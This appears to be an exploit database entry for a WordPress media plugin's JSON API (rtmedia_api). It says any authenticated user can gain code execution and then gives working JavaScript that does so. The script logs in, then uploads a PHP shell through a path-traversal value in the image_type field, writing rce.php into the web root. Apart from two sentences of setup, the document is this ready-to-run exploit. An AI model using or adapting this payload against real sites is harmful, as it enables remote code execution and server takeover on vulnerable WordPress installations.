## https://sploitus.com/exploit?id=WPEX-ID:3D6889E3-A01B-4E7F-868F-AF7CC8C7531A
If plugin JSON API is enabled, any logged-in user may execute arbitrary code by uploading a PHP file. After enabling the API in settings and installing buddypress, run the following code, replacing the username, password, and server path as needed.
fetch("/wp-admin/admin-ajax.php?action=rtmedia_api", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": "method=wp_login&username=USERNAME&password=PASSWORD",
"method": "POST",
}).then((response) => {
return response.json();
}).then((data) => {
const formData = new FormData()
formData.append('rtmedia_file', btoa('<?php system("ps"); ?>'));
formData.append('method', 'rtmedia_upload_media');
formData.append('image_type', './../../../../../var/www/html/wp-content/rce.php');
formData.append('title', '../');
formData.append('token', data.data.access_token);
fetch('/wp-admin/admin-ajax.php?action=rtmedia_api', {
method: 'POST',
body: formData
});
});